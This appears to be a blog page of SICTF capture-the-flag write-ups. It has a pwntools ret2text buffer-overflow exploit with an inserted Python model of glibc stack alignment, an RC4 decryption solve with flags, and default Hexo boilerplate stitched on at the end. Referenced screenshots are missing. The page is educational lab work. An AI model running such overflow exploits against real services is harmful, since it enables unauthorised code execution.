While working on a ret2text challenge today, I ran into an odd problem: the exploit failed locally but worked against the remote service. The challenge looks like this:
The backdoor function looks like this:
The exploit looks like this:
```python
from pwn import *
elf = context.binary = ELF('./Intruduce')
p = process()
context.log_level = 'debug'
payload = b'a' * (32 + 8)       # 32-byte buffer + saved rbp
backd00r = 0x4011B6             # address of the backdoor function
payload += p64(backd00r)        # overwrite the return address
s = p.recvline(); print(s)
print(s)
char = p.recv(1)
print(char)
p.sendline(payload)
p.interactive()
```
Debugging with gdb, I found that it got stuck on this xmm register instruction at the time of `call system`:
After some searching I found the solution here: https://blog.csdn.net/fjh1997/article/details/107695261
It turns out that with glibc >= 2.27, system() uses xmm registers, which require 16-byte alignment. The remote environment is presumably < 2.27, so the payload works there directly, while my local glibc is 2.35, so the exploit fails because of the xmm alignment requirement. Pushing one address fewer is enough to make the stack aligned again.
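As an added illustration that is not part of the original post, the following Python models rsp modulo 16 along the two paths into the backdoor (a normal call versus the overflowed function's `ret`) to show why system() on newer glibc sees a misaligned stack and why entering the backdoor one push later fixes it. The instruction sequences of the vulnerable function and the backdoor, and the 0x20-byte frame, are assumptions.

```python
# Added example, not the post's own code. Assumed layout: the vulnerable
# function is `push rbp; sub rsp,0x20; ...; leave; ret`, and the backdoor is
# `push rbp; mov rbp,rsp; ...; call system`.

ABI_ENTRY_MOD16 = 8  # SysV x86-64: caller keeps rsp 16-aligned before `call`,
                     # so every function starts with rsp == 8 (mod 16)

def walk(ops, rsp_mod16):
    """Track rsp modulo 16 through simple stack operations."""
    trace = []
    for op in ops:
        if op in ("push", "call"):          # both write an 8-byte slot
            rsp_mod16 = (rsp_mod16 - 8) % 16
        elif op in ("pop", "ret"):          # both consume an 8-byte slot
            rsp_mod16 = (rsp_mod16 + 8) % 16
        elif op.startswith(("sub ", "add ")):
            n = int(op.split()[1], 0)
            rsp_mod16 = (rsp_mod16 - n if op.startswith("sub") else rsp_mod16 + n) % 16
        else:
            raise ValueError(f"unknown op {op!r}")
        trace.append((op, rsp_mod16))
    return trace

def rsp_at_system_entry(backdoor_ops, entry_mod16):
    """rsp mod 16 that system() observes when the backdoor reaches `call system`."""
    for op, mod in walk(backdoor_ops, entry_mod16):
        if op == "call":
            return mod
    raise ValueError("backdoor never calls system")

def system_accepts(mod16):
    # glibc >= 2.27's system() uses movaps on stack slots laid out for the
    # ABI entry state; anything other than 8 (mod 16) faults.
    return mod16 == ABI_ENTRY_MOD16

# leave == mov rsp,rbp (undoes the sub) ; pop rbp
VULN_EPILOGUE = ["push", "sub 0x20", "add 0x20", "pop", "ret"]
BACKDOOR = ["push", "call"]          # push rbp ... call system
BACKDOOR_AFTER_PUSH = ["call"]       # enter one instruction later: one push fewer

def ret2text_entry_mod16():
    """rsp mod 16 at backdoor entry when reached via the overflowed ret, not a call."""
    return walk(VULN_EPILOGUE, ABI_ENTRY_MOD16)[-1][1]

if __name__ == "__main__":
    legit = rsp_at_system_entry(BACKDOOR, ABI_ENTRY_MOD16)
    overflowed = rsp_at_system_entry(BACKDOOR, ret2text_entry_mod16())
    fixed = rsp_at_system_entry(BACKDOOR_AFTER_PUSH, ret2text_entry_mod16())
    print("normal call  :", legit, system_accepts(legit))            # 8 True
    print("ret2text     :", overflowed, system_accepts(overflowed))  # 0 False
    print("one push less:", fixed, system_accepts(fixed))            # 8 True
```

The ret path leaves rsp 8 bytes off the state a `call` would have produced, which is why the same payload is fine on an older glibc whose system() has no aligned stack access.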
Reverse
[Warm-up] PYC
The pycdc on my machine was broken, so I used an online decompiler instead:
https://www.lddgo.net/string/pyc-compile-decompile
print('SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}')
Myobject
It is RC4 encryption/decryption, so I wrote a script:
```python
def rc4(key, plaintext):
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA), XORed with the input
    i = 0
    j = 0
    output = []
    for byte in plaintext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        output.append(byte ^ K)
    return output

key = [ord(char) for char in "SIFLAG"]
# The 27-byte ciphertext is split across three stack variables in the binary
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')
full_ciphertext_27 = list(v18_bytes) + ciphertext_v19 + list(v20_bytes)
decrypted_full_combined = rc4(key, full_ciphertext_27)
decrypted_full_combined_string = ''.join([chr(byte) for byte in decrypted_full_combined])
print(decrypted_full_combined_string)
```
SICTF{wow_you_get_the_flag}
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick Start
Create a new post
$ hexo new "My New Post"
More info: Writing
Run server
$ hexo server
More info: Server
Generate static files
$ hexo generate